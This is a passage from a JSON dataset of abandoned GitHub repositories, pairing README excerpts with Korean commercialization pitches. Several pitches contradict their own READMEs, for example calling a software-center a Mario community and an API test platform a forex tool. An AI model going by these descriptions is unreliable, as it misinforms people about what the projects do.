Google Hang","composite_score":0.4006,"license_safety_tag":"restricted"},{"name":"fossasia/susi_skypebot","github_url":"https://github.com/fossasia/susi_skypebot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":100,"description":"# SUSI Skypebot 프로젝트 평가\n\n## 왜 보물인가\n마이크로소프트 스카이프에서 바로 사용할 수 있는 인공지능 챗봇으로, 따로 앱을 설치하지 않고도 일상적인 질문에 자동으로 답변해주는 서비스입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 직원들의 스카이프에서 자동 업무 지원(휴가 신청, 경비 보고 등)을 받을 수 있는 구","readme_excerpt":"## Getting Started with SUSI Skype Bot:\n\nTo add SUSI Skype bot as a friend click on   [Add SUSI as a friend](https://join.skype.com/bot/5d336a42-124a-4b79-bbbe-788998da27a1) and if you want to make your own SUSI Skype bot then follow below given steps:\n\n## Pre-requisites:\n\n- Microsoft&#39;s developer Bot Framework Account\n- Github Account\n- Heroku Account\n\n## Steps:\n\n1. Fork this repository.\n\n2. You have to replace appID and appPassword with your own ID and Password which you can get by below given steps.\n\n3. Sign in/Sign up to this [https://dev.botframework.com/](https://dev.botframework.com/). After signing in go to My Bots option at the top of the page and Create/Register your bot. Enter details of your bot and click on &quot;Create Microsoft App ID and password&quot;.\n\n   ![CREATE_BOT](/docs/images/createbot.PNG)\n   \n\n   ![BOT_PROFILE](/docs/images/BotProfile.PNG)\n\n4. Leave messaging endpoint for now after getting app ID and password we will write messaging endpoint.\n\n5. Copy your ","composite_score":0.4006,"license_safety_tag":"restricted"},{"name":"fossasia/AYABInterface","github_url":"https://github.com/fossasia/AYABInterface","stars":12,"language":"Python","license":"LGPL-3.0","abandonment_months":68,"description":"# AYABInterface 평가 분석\n\n## 왜 보물인가\n자동으로 옷감에 무늬를 짜는 기계(织布机)를 누구나 쉽게 제어할 수 있는 오픈소스 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **DIY 织布 커뮤니티 플랫폼**: 취미로 옷을 만드는 사람들이 구독하는 웹 서비스로, 디자인 템플릿과 기술 지원 제공\n2. **섬유 교육 기관용 도구**: 패션학과","readme_excerpt":"AYABInterface\n=============\n\n.. image:: https://travis-ci.org/fossasia/AYABInterface.svg\n   :target: https://travis-ci.org/fossasia/AYABInterface\n   :alt: Build Status\n   \n.. image:: https://ci.appveyor.com/api/projects/status/a6yhbt0rqvb212s7?svg=true\n   :target: https://ci.appveyor.com/project/AllYarnsAreBeautiful/AYABInterface\n   :alt: AppVeyor CI build status (Windows)\n   \n.. image:: https://codeclimate.com/github/fossasia/AYABInterface/badges/gpa.svg\n   :target: https://codeclimate.com/github/fossasia/AYABInterface\n   :alt: Code Climate\n\n.. image:: https://codeclimate.com/github/fossasia/AYABInterface/badges/coverage.svg\n   :target: https://codeclimate.com/github/fossasia/AYABInterface/coverage\n   :alt: Test Coverage\n\n.. image:: https://codeclimate.com/github/fossasia/AYABInterface/badges/issue_count.svg\n   :target: https://codeclimate.com/github/fossasia/AYABInterface\n   :alt: Issue Count\n\n.. image:: https://badge.fury.io/py/AYABInterface.svg\n   :target: https://pypi.python.org/p","composite_score":0.4006,"license_safety_tag":"restricted"},{"name":"fossasia/wp-tweet-feed-plugin","github_url":"https://github.com/fossasia/wp-tweet-feed-plugin","stars":11,"language":"PHP","license":"GPL-2.0","abandonment_months":115,"description":"# WP Tweet Feed Plugin 상용화 분석\n\n## 왜 보물인가\n워드프레스 웹사이트에 트위터 콘텐츠를 자동으로 표시해주는 플러그인으로, SNS 연동이 필요한 중소 비즈니스와 블로거에게 즉시 활용 가능한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 트위터 피드를 자동으로 웹사이트에 표시해주는 클라우드 기반 서비스로 패키징\n","readme_excerpt":"=== Twitter Widget ===\n\nContributors: fossasia\nTags: loklak, feed, tweet feed, loklak API, twitter, widget, feed\nRequires at least: 3.0\nTested up to: 4.3\nStable tag: 1.0\n\nA widget that properly handles twitter feeds, including parsing @username, #hashtags, and URLs into links.\n\n== Description ==\n\nA widget that properly handles twitter feeds, including parsing @username, #hashtag, and URLs into links.  It supports displaying profiles images, and even lets you control whether to display the time and date of a tweet or how log ago it happened (about 5 hours ago, etc).\n\n\n== Installation ==\n\n1. Use automatic installer to install and active the plugin.\n1. You should see a notice appear in your admin that links you to the settings page.\n1. Follow the instructions to setup your Twitter app and authenticate your account (an unfortunate step made necessary by Twitter's API changes).\n1. In WordPress admin go to 'Appearance' -> 'Widgets' and add \"Twitter Widget\" to one of your widget-ready areas o","composite_score":0.4006,"license_safety_tag":"restricted"},{"name":"wvanlit/rust-monkey","github_url":"https://github.com/wvanlit/rust-monkey","stars":21,"language":"Rust","license":"GPL-3.0","abandonment_months":79,"description":"","readme_excerpt":"# rust-monkey\n![Monkey](https://cloud.githubusercontent.com/assets/1013641/22617482/9c60c27c-eb09-11e6-9dfa-b04c7fe498ea.png)\n\nA rust version of the Monkey Interpreter from \"Writing an Interpreter in Go\"\n\nWritten without any external libraries, lexers or parsers.\n\nInspired by [this repo](https://github.com/Rydgel/monkey-rust).\n\n## REPL\nThe REPL is started when running the repo:\n\n`cargo run`\n## Tests\nAll tests from \"Writing an Interpreter in Go\" have been copied.\n\n## Implemented Features\nRust-Monkey supports:\n* Variable bindings, \n* Prefix and Infix operators\n* First-class and Higher-order Functions\n* Closures\n* Integers, Booleans, Strings\n* Immutable Arrays \n* Hashes \n\n## Planned Features\n* While Loops\n* For Loops\n","composite_score":0.4005,"license_safety_tag":"restricted"},{"name":"HCADatalab/IClojure","github_url":"https://github.com/HCADatalab/IClojure","stars":12,"language":"Clojure","license":"EPL-1.0","abandonment_months":88,"description":"# IClojure 저장소 분석\n\n## 왜 보물인가\nJupyter 노트북처럼 웹 브라우저에서 Clojure 프로그래밍을 쉽게 배우고 실행할 수 있는 교육용 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 Clojure 학습 플랫폼으로 월간 구독 요금 수집\n- **내부 업무 도구**: 대학과 교육기관의 프로그래밍 강의 환경으로 라이","readme_excerpt":"![IClojure](https://i.imgur.com/PkyAoD7.png)\n# A Jupyter kernel for Clojure based on the Unrepl protocol.\n  - Inspired by (and bootstrapped from) the Clojupyter project.\n  - Evaluate Clojure code on either a local or remote socket repl (port-forwarding)\n  - Ship dependencies to remote repl only when needed\n  - Avoids printing large results with configurable data structure elision\n  - Render HTML, Latex, and Markdown\n\n### Try it!\n\n```sh\ndocker run -p 8888:8888 cgrand/iclojure\n```\n\nWatch the output for a url and/or a token, for example:\n```\n[I 13:10:02.189 LabApp] The Jupyter Notebook is running at:\n[I 13:10:02.189 LabApp] http://(c94e72d6fe5f or 127.0.0.1):8888/?token=0212d3870d2feb2a4148045e5b1df77460dc4618fe6854d2\n```\n\nGo to localhost:8888 and enter the token (`0212d3870d2feb2a4148045e5b1df77460dc4618fe6854d2` above).\n\nThis docker image is built using the `Dockerfile` provided in this repository. In addition to the kernel istelf, the `iclojure_extension` is enabled which allows intera","composite_score":0.4005,"license_safety_tag":"unknown"},{"name":"liwanlei/FXTest","github_url":"https://github.com/liwanlei/FXTest","stars":5,"language":"Python","license":"MIT","abandonment_months":6,"description":"# FXTest 저장소 분석 보고서\n\n## 왜 보물인가\n외환(FX) 거래 시스템이 실제로 제대로 작동하는지 자동으로 검증해주는 도구로, 금융 회사들의 큰 손실을 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 외환 거래사들이 월 구독으로 자신의 거래 알고리즘 검증 서비스 이용\n2. **내부 업무 도구**: 대형 금","readme_excerpt":"# FXTest测试平台\n### Flask + Python3.6 +Bootstarp+Apscheduler+Sqlite+Redis 实现的接口自动化测试平台。\n###  下面有介绍python flask部署相关的文章链接。为自己部署的记录文章\n### 前后端部分页面开始进行分离，通过接口进行交互\n\n----------------\n##  友情提示各位：开源项目，长期不定时的维护，仅供大家参考学习使用。谢绝作为面试、毕业作品等源码。\n##  后续会基于python3.6+去维护平台。平台所有文章都位于doc目录，或者本文章有介绍，暂无其他资料。\n\n----------------\n# 本地调试 安装依赖包后， python manage.py run即可  成功可以访问http://127.0.0.1:5000/index\n# 项目使用的数据库是sqlite\n## 配置文件都在config.py，可以根据自己的实际情况进行修改\n# 在启动的过程中，可能会因为没有jenkis服务，jenkins的相关的代码已经注销。如果需要jenkins代码可以在app/home/views.py,app/home/urls.py,app/templates/back.html恢复即可。\n### flask +gevent+nginx+Gunicorn+supervisor部署flask应用请用flaskapi_su.conf，用gunicorn部署应用。\n### supervisor配置可见super.conf文件。\n### 多用例定时任务完成的通知通过的钉钉群机器人通知，没有配置会获取config.py默认的\n### 定时任务现在依赖与redis做持久化，如果有报redis错误，请安装redis服务。\n\n\n ----------------\n \n## 4.2.0版本计开发中\n### 1.集成到jenkins ,目前代码需要jenkins，因此在运行的时候 需要安装jenkins(代码已经开发，默认是注销的)\n### 2.测试用例代码抽离(参考开源的接口测试框架),形成测试执行平台，用例执行的分离。（将new_unittest_case抽离即可）\n### 3.一键将接口测试用例转化为压测脚本，进行压测。转换为Jmeter脚本(后端接口开发完成)\n### 4.测试用例可以","composite_score":0.4005,"license_safety_tag":"safe"},{"name":"yacy/yacy_docs","github_url":"https://github.com/yacy/yacy_docs","stars":12,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# YaCy Docs 저장소 분석\n\n## 왜 보물인가\n인터넷 검색을 중앙 회사에 의존하지 않고 개인과 조직이 직접 운영할 수 있도록 돕는 분산형 검색 엔진의 문서 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 내부 문서만 검색하는 사설 검색 서비스를 구독형으로 제공\n2. **내부 업무 도구**: 대학, 병원, 법무법인 등이 자","readme_excerpt":"","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"w568w/GitHubFollow","github_url":"https://github.com/w568w/GitHubFollow","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":104,"description":"# GitHubFollow 저장소 분석\n\n## 왜 보물인가\nGitHub에서 팔로우하는 사람들의 활동을 자동으로 추적하고 관리할 수 있는 도구로, SNS 인맥 관리의 번거로움을 덜어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: GitHub 개발자들을 위한 \"내 팔로워 활동 모니터링\" 웹 서비스로 월 구독료 징수\n2. **내부 업무 도구**","readme_excerpt":"中国人 [点这里](README_CN.md)\n# GitHubFollow\nAuto follow for gitstar.cn\n# Usage\n## Linux\n### Step1\nInstall Python 2.x,run```python --version```and```pip```for a test.  \n\nTo install pip, securely download [get-pip.py](https://bootstrap.pypa.io/get-pip.py)\n\nThen run the following:\n\n> python get-pip.py\n\nIf you have downloaded it,skip the step.  \nMAKE SURE that you have installed ```requests```.\n> pip install -r requirements.txt\n### Step2\nOpen```main.py```,replace  \n```\n#-----------------------------\n#GitStar\nNAME=\"w568w\"\nPASSWORD=\"xxxx\"\n#GitHub\nGITNAME=\"w568w\"\nGITPASSWORD=\"xxxx\"\n#-----------------------------\n```\nwith your own information.\n### Step3\nRun```python -u main.py```,  \nEverything is ok,hooray!\n## Windows\nI haven't used Windows for a long time.  \nYou can google ```windows python``` for more information.Good luck!\n\n\n","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"fossasia/phimpme-artwork","github_url":"https://github.com/fossasia/phimpme-artwork","stars":12,"language":"","license":"GPL-3.0","abandonment_months":101,"description":"# fossasia/phimpme-artwork 분석\n\n## 왜 보물인가\n오픈소스 사진 편집 앱을 위한 디자인 자산들을 모아둔 저장소로, 누구나 자유롭게 사용할 수 있는 시각 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 웹/모바일 기반 사진 편집 서비스에서 UI 디자인 요소로 활용\n2. **내부 디자인 시스템**: 여러 앱","readme_excerpt":"# phimpme-artwork\nPhimpme Artwork\n\n![Phimpme](/logo/phimpme-logo-xxxhdpi.png)\n\nContribute - https://github.com/fossasia/phimpme-android\n\nPhimp.me is a Photo App for Android that aims to replace proprietary photo applications. It offers features such as taking photos, adding filters, editing images and uploading them to social networks.\n\n<a href=\"https://play.google.com/store/apps/details?id=org.fossasia.phimpme\">\n    <img alt=\"Get it on Google Play\"\n        height=\"80\"\n        src=\"https://play.google.com/intl/en_us/badges/images/generic/en_badge_web_generic.png\" />\n</a>\n\n\n","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"hellozee/blender-toolbox-qt","github_url":"https://github.com/hellozee/blender-toolbox-qt","stars":5,"language":"C++","license":"GPL-3.0","abandonment_months":79,"description":"# Blender Toolbox Qt 상용화 분석\n\n## 왜 보물인가\n3D 디자인 소프트웨어인 블렌더에서 반복적인 작업을 자동으로 처리해주는 편의 도구로, 디자이너들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 클라우드 기반 3D 디자인 자동화 플랫폼으로 운영하여, 설치 없이 웹에서 바로 복잡한 3D 작업을","readme_excerpt":"# blender-toolbox-qt\nI really liked the UI of the new Blender 2.8, so just a fun side project to recreate a blender like toolbox in Qt.\nThis is just a protoype, not usable, but can be made usable. [Here](https://www.youtube.com/watch?v=BAghmqj057U) is a small video of it.\n\n![screenshot](https://i.ibb.co/cNQdnJs/image.png)\nPS: The icons are from the krita repo [here](https://invent.kde.org/kde/krita/) and not mine, :)\n","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"OpnTec/OpenTechEvents","github_url":"https://github.com/OpnTec/OpenTechEvents","stars":12,"language":"Java","license":"GPL-3.0","abandonment_months":101,"description":"# OpenTechEvents 분석 보고서\n\n## 왜 보물인가\n기술 행사와 개발자 커뮤니티 이벤트를 한 곳에서 찾고 관리할 수 있는 플랫폼으로, 흩어져 있는 행사 정보를 모아 개발자들의 학습 기회를 크게 늘릴 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (이벤트 검색 플랫폼)**\n개발자와 기술 종사자들이 월 구독으로 자신의 지역과 관","readme_excerpt":"![Open Event Android](https://storage.googleapis.com/eventyay.com/assets/branding/android_branding.png)\n\n[![Build Status](https://travis-ci.org/fossasia/open-event-android.svg?branch=development)](https://travis-ci.org/fossasia/open-event-android?branch=development)\n[![codecov.io](https://codecov.io/github/fossasia/open-event-android/coverage.svg?branch=development)](https://codecov.io/github/fossasia/open-event-android?branch=development)\n[![Join the chat at https://gitter.im/fossasia/open-event-android](https://badges.gitter.im/fossasia/open-event-android.svg)](https://gitter.im/fossasia/open-event-android?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Preview the app](https://img.shields.io/badge/Preview-Appetize.io-orange.svg)](https://appetize.io/app/2rfx5pavny47jnb1qzwg204fr8)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/15475df939da4195ae36f06f235a7aad)](https://www.codacy.com/app/harshithdwivedi/open-event-android?utm_source=github.","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"fossasia/x-mario-center","github_url":"https://github.com/fossasia/x-mario-center","stars":12,"language":"Python","license":"GPL-3.0","abandonment_months":119,"description":"# X-Mario-Center 분석 보고서\n\n## 왜 보물인가\n오래된 마리오 게임 커뮤니티 플랫폼으로, 레트로 게임 팬들의 모임 공간을 자동화하고 관리할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 커뮤니티 관리 SaaS**: 레트로 게임 클럽이나 마리오 팬덤 커뮤니티가 멤버십, 이벤트, 토너먼트를 온라인으로 운영할 수 있는 서비스\n2. ","readme_excerpt":"= User notes =\n\nThe software-center application aims to make the software handling on\nthe computer easy and consistent.\n\n= Developer notes =\n\nAll non UI code must come with tests in the test/ subdirectoy.\n\nTo setup your development environment, you'll need to ensure the following\nextra packages are installed:\n\nsudo apt-get install xvfb python-coverage python-mock python-aptdaemon.test \\\n     python-qt4 python-unittest2 python-lxml pep8\nsudo apt-get build-dep software-center\n\nYou can then run tests with:\n\ncd test;make\n\nYou can run a developer instance with:\n\npython setup.py build\n./software-center\n\nThe initial launch of this will take a bit as it will build a private\nsearch database but this is only needed once.\n\n== query parser ==\n\nThe query parser understands :\n \"pkg:2vcard\", \"mime:text/html\", \"section:web\", \"origin:main\"\nprefixes.\n\n== aptdaemon ==\n * the dbus limits for the system bus are rather low, this means that\n   adding  <limit name=\"max_match_rules_per_connection\">512</limit>\n","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"phimpme/phimpme-android-v1","github_url":"https://github.com/phimpme/phimpme-android-v1","stars":11,"language":"Java","license":"GPL-3.0","abandonment_months":139,"description":"# Phimpme Android v1 상용화 분석\n\n## 왜 보물인가\n스마트폰 사진 편집과 공유를 한 번에 처리하는 올인원 앱으로, 사진을 많이 다루는 일반인들의 일상 작업을 크게 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 편집 구독 서비스(월 $4.99)로 프리미엄 필터와 클라우드 저장소 제공\n2. **내부 업무","readme_excerpt":"Phimp.me Android App\n=======\n\nThe whole project includes this repo and the Generator. It aims to create a photo sharing app and a generator that can customize it.\n\nInstallation\n-------\n\nWe provide Phimpme-debug-unaligned.apk for quick install. It's the debug version APK generated by Android Studio automatically.\n\nDevelopment Environment\n-------\n\nThis project is created by Android Studio 0.8.2. You can download the newest version from [Android Developers site](https://developer.android.com/sdk/installing/studio.html).\n\nThe following in Android SDK is required:\n* Tools/Android SDK Tools\n* Tools/Android SDK Platform-tools\n* Tools/Android SDK Build-tools (20)\n* Android 4.4.2 (API 19)/SDK Platform\n* Android 4.4.2 (API 19)/Sources for Android SDK\n* Extras/Android Support Repository\n* Extras/Android Support Library\n* Extras/Google Play services\n* Extras/Google Repository\n\nTo import this project, download and install Android Studio, launch it and hit \"Import Project...\" from the Quick Start. T","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"fashiontec/fashiontec.org","github_url":"https://github.com/fashiontec/fashiontec.org","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":69,"description":"# fashiontec/fashiontec.org 분석\n\n## 왜 보물인가\n패션 산업의 기술 표준화를 추진하는 오픈소스 프로젝트로, 의류 업계 디지털 전환의 기반이 될 수 있는 잠재력을 가지고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의류 제조사 관리 SaaS**: 원단 규격, 사이즈, 생산 공정을 표준화된 형식으로 관리하는 클라우드 서비스\n2. **","readme_excerpt":"# fashiontec.org\nFashiontec Website\n","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"fossasia/jugaadfest-artwork","github_url":"https://github.com/fossasia/jugaadfest-artwork","stars":12,"language":"","license":"GPL-3.0","abandonment_months":93,"description":"# Jugaadfest Artwork 저장소 분석\n\n## 왜 보물인가\nJugaadfest의 공식 디자인 자산을 한곳에 모아 재사용 가능하게 만든 브랜드 아트 라이브러리로, 행사 관련 모든 홍보물과 굿즈 제작에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **행사 기획사 SaaS**: 컨퍼런스나 축제 주최사들이 공개 저장소에 자신의 디자인 템","readme_excerpt":"# jugaadfest-artwork\nJugaadfest Artwork\n\nhttps://jugaadfest.com\n\n![image](/logo/jugaadfest-idea.png)\n","composite_score":0.4004,"license_safety_tag":"restricted"},{"name":"MBMIT/MBM-Labs","github_url":"https://github.com/MBMIT/MBM-Labs","stars":11,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# MBMIT/MBM-Labs 상용화 분석\n\n## 왜 보물인가\n개발이 중단된 지 7년이 지났기 때문에 현재 시장 수요와 기술 트렌드에 맞게 재개발하면 경쟁이 적은 틈새시장을 공략할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 코드 기반으로 클라우드 분석 플랫폼을 만들어 구독 모델로 판매\n2. **내부 업무 도구**: 기업의 데","readme_excerpt":"# MBM-Labs\nMBM Labs and Ideas\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"OpnTec/openxlab-artwork","github_url":"https://github.com/OpnTec/openxlab-artwork","stars":12,"language":"","license":"GPL-3.0","abandonment_months":103,"description":"# OpnTec/openxlab-artwork 분석\n\n## 왜 보물인가\n오픈소스 미술/디자인 자산을 공유하는 커뮤니티 저장소로, 누구나 자유롭게 사용할 수 있는 창작 자료를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 디자인 에디터 플랫폼에 무료 템플릿 라이브러리로 제공\n- **내부 업무 도구**: 회사 마케팅팀이 브랜드 가이","readme_excerpt":"# openxlab-artwork\nOpenXlab Artwork\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"party-repl/clojure-party-repl","github_url":"https://github.com/party-repl/clojure-party-repl","stars":9,"language":"Clojure","license":"EPL-1.0","abandonment_months":91,"description":"# Clojure Party REPL 사업화 분석\n\n## 왜 보물인가\n프로그래머들이 코드를 실시간으로 테스트하고 함께 실험할 수 있는 협업 도구로, 개발 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 프로그래밍 교육 플랫폼에서 학생들이 강사와 실시간으로 코드를 작성하고 결과를 공유하는 학습 환경\n2. **내부 ","readme_excerpt":"# Clojure Party REPL\n\nClojure REPL for Atom written in ClojureScript with full Teletype support for pair programming. Let's party! 😄\n\n![Screenshot](screenshot.png)\n\n\n## How to use this\nOpen or add your project folder inside Atom, and follow one of the methods below:\n\nStart a local nREPL server with Leiningen:\n1. Open a file in the project folder, and focus on the file so it has a blinking cursor.\n\n2. Go to Atom's menu bar and select Packages -> Clojure Party Repl -> Start Local REPL\n\n3. Make sure `lein` command is available and there's `project.clj` in the root directory.\n\nConnect to a remote nREPL server:\n1. Have a running nREPL ready to be connected.\n\n2. Go to Atom's menu bar and select Packages -> Clojure Party Repl -> Connect to Remote REPL server\n\n3. Fill out the pop out panel and hit an Enter key to connect.\n\nConnect to a remote [Unrepl](https://github.com/Unrepl/unrepl) server:\n1. Have a running Clojure Socket REPL ready to be connected. Socket REPL can be launched in a few diff","composite_score":0.4003,"license_safety_tag":"unknown"},{"name":"ffii/ffii-projects","github_url":"https://github.com/ffii/ffii-projects","stars":11,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# ffii-projects 보물 분석\n\n## 왜 보물인가\n유럽의 소프트웨어 특허 문제에 관한 정책 자료와 프로젝트들을 모아둔 귀중한 지식 저장소로, 기술 정책 분야의 역사적 기록입니다.\n\n## 어디에 쓸 수 있나\n\n1. **정책 연구 플랫폼**: 대학 및 싱크탱크에서 소프트웨어 특허 정책의 역사와 영향을 분석하는 학술 자료 제공 서비스\n2. **기업 컴플","readme_excerpt":"# ffii-projects\nProject List of FFII\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"yacy/yacy_artwork","github_url":"https://github.com/yacy/yacy_artwork","stars":10,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# YaCy Artwork 저장소 분석\n\n## 왜 보물인가\n인터넷 검색 엔진을 만드는 오픈소스 프로젝트의 시각 자료와 로고 모음으로, 분산형 검색 기술의 브랜딩 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **검색 엔진 SaaS**: YaCy 기반 검색 서비스를 제공하면서 브랜드 이미지 통일에 사용\n2. **기업 내부 도구**: 회사 인트라넷 검색 시스템","readme_excerpt":"# yacy_artwork\nYacy Artwork\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"OpnTec/opentechsummit.in","github_url":"https://github.com/OpnTec/opentechsummit.in","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":79,"description":"# OpnTec/opentechsummit.in 분석\n\n## 왜 보물인가\n기술 커뮤니티 행사를 온라인으로 관리하고 홍보할 수 있는 완성된 웹사이트 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 컨퍼런스나 세미나 주최자들이 월간 구독으로 자신의 행사 웹사이트를 만들고 관리\n2. **내부 업무 도구**: 대학이나 기업의 기술 커뮤","readme_excerpt":"# opentechsummit.in\nOpenTechSummit India\n\nhttps://opentechsummit.in\n","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"Zchander/ESP32Reflow","github_url":"https://github.com/Zchander/ESP32Reflow","stars":10,"language":"C++","license":"GPL-3.0","abandonment_months":91,"description":"# ESP32 Reflow 저장소 분석\n\n## 왜 보물인가\n전자제품 제조에 필수적인 반도체 납땜 온도 제어 장치를 저비용으로 만들 수 있는 오픈소스 설계도입니다.\n\n## 어디에 쓸 수 있나\n1. **전자기기 제조 SaaS**: 소규모 전자제품 생산업체를 위한 납땜 온도 관리 시스템 클라우드 서비스\n2. **내부 업무 도구**: 전자부품 조립 공장의 품질 관","readme_excerpt":"Forked project as an attempt to support the ESP32 (Pico D4)\nRenamed the fork\n\n![Invent This, Invent That](schematics/IT2-logo.png)\n\n# ESPReflow\nFirmware for SMT reflow controller.\n\n> **!!! WARNING: This project deals with mains power and high current !!!**\n> Please be careful if you wish to replicate any of it's functionality and never work on a PCB or any open wires that are connected to the mains !\n> Author has no responsibility for your safety and wellbeing, so please take care of yourself.\n\n![ESPReflow Web UI](doc/WebUI.PNG)\n\n# How it works\nThe purpose of this project is to control a heater of any sort to facilitate SMT reflow soldering utilizing a predefined temperature profile. Control of the heater is performed by ESP8266 or ESP32 chip via Web UI over WiFi.\n\nTo achieve that, readings from a thermocouple are used for closed loop temperature control of the target board. The controller does it's best to follow a preconfigured temperature profile for a particular SMT soldering. Of c","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"wsdjeg/vim-galore-zh_cn","github_url":"https://github.com/wsdjeg/vim-galore-zh_cn","stars":8,"language":"Vim Script","license":"CC-BY-SA-4.0","abandonment_months":17,"description":"# vim-galore-zh_cn 저장소 분석\n\n## 왜 보물인가\n복잡한 텍스트 편집기를 쉽게 배울 수 있도록 정리한 중국어 학습 자료로, 프로그래머들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 코딩 교육 플랫폼**\n- 프로그래밍 입문자 대상 유료 강좌의 기초 자료로 활용\n- 기존 콘텐츠에 없던 실용적인 팁 제공으로","readme_excerpt":"<div align='center'>\n  <h1>Vim 从入门到精通</h1>\n  <br /><br />\n</div>\n\n<!-- vim-markdown-toc GFM -->\n\n<!-- vim-markdown-toc -->\n\n文章移至： [https://wsdjeg.net/vim-galore-zh-cn/](https://wsdjeg.net/vim-galore-zh-cn/)\n","composite_score":0.4003,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_heatmap","github_url":"https://github.com/fossasia/loklak_heatmap","stars":11,"language":"HTML","license":"GPL-3.0","abandonment_months":90,"description":"# fossasia/loklak_heatmap 상용화 분석\n\n## 왜 보물인가\n지도 위에 실시간 데이터를 시각화하는 기술로, 어느 지역에서 어떤 일이 일어나고 있는지 한눈에 볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 재난 모니터링 플랫폼 - 홍수, 화재 등 재난 발생 지역을 실시간으로 지도에 표시하는 구독형 서비스\n2. **","readme_excerpt":"# LoklakHeatmap\n\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n\nTweet Heatmap using loklak as a source.\n\n\n![Screenshot](https://cloud.githubusercontent.com/assets/3987198/18433618/f48d8a04-78e8-11e6-836d-85b231aeb5a0.png\n)\n\nDemo: <http://polbaladas.com/loklakHeatMap/>\n\n##Set up / Requirements\n\nPython Packages:\n\nFlask 0.11.1\n\nRequests 2.10.0\n\nInstall with pip and requirements.txt.\n\n## Local Set up\n\nInstall Requirements:\n```pip install -r requirements.txt```\n\nRun App:\n```python main.py```\n\nAnd the app should be running locally on port 5000 (127.0.0.0:5000) .\n\n##Server set up\n\nInstall the app requirements just like in the local set up scenario.\nInstall your prefered server software (demo uses apache) and configure it to run the Flask App. \n\nDigitalOcean has a great tutorial to set up Flask apps with apache and nginx in an ubuntu environment:\n<https://www.digitalocean.com/community/tutorials/how-to-serve-fla","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"phimpme/phimpme-generator","github_url":"https://github.com/phimpme/phimpme-generator","stars":11,"language":"Python","license":"GPL-3.0","abandonment_months":143,"description":"# phimpme-generator 평가 보고서\n\n## 왜 보물인가\n사진을 자동으로 정리하고 꾸며주는 도구로, 수천 장의 사진을 손쉽게 관리하고 싶은 사람들의 시간을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰 사진 자동 정렬·편집 앱으로 구독 모델로 운영 (예: 프리미엄 필터, 클라우드 저장)\n2. **내","readme_excerpt":"Phimp.me Generator\n=======\n\nThe whole project includes this repo and the Android app. It aims to create a photo sharing app and a generator that can customize it. This repo is the generator part, which is a website where users can customerize their own photo app with their own name and own set of functions.\n\nInstallation\n-------\n\nThis repo contains a Django website, and the generator script ([gen_script.py](phimpme/generator/blob/master/Phimpme/Phimpme/settings.py)).\nTo test the whole website:\n\n1. [Install Django](https://www.djangoproject.com/download/)\n2. Go to `Phimpme/Phimpme/apps/appshop/gen_script.py` you will see  \n`template_path = \"/Users/yzq/Documents/GitHub/phimpme-android/Phimpme\"`  \nChange it to the path of the source code of Phimp.me Android app.\n3. Create a `local.properties` file in Phimp.me Android app, as described in [the app wiki](https://github.com/phimpme/android/wiki#build-in-command-line).\n3. Go to the root of this repo and execute `python manage.py syncdb` to cr","composite_score":0.4003,"license_safety_tag":"restricted"},{"name":"arcanteus/formally","github_url":"https://github.com/arcanteus/formally","stars":15,"language":"HTML","license":"GPL-3.0","abandonment_months":29,"description":"# Formally 저장소 분석\n\n## 왜 보물인가\n형식 검증과 